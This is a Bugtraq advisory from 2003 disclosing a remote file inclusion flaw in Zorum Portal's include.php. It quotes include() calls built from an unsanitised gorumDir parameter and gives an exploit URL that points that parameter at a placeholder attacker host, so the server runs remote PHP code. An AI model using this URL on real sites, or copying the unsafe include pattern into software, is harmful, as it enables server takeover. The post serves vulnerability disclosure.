Bugtraq mailing list archives
Zorum Portal (PHP)
From: MGhz <magas () mail lt>
Date: 22 Jan 2003 19:45:26 -0000
Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: --------------------------------- include.php --------------------------------- PHP Code: --------------------------------- [...] include("$gorumDir/generformlib_multipleselection.php"); include("$gorumDir/generformlib_groupselection.php"); include("$gorumDir/generformlib_filebutton.php"); include("$gorumDir/group.php"); [...] --------------------------------- Exploit : --------------------------------- http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ --> include http://[attacker]/group.php on remote server --------------------------------- -- magas () mail lt
Current thread:
- Zorum Portal (PHP) MGhz (Jan 22)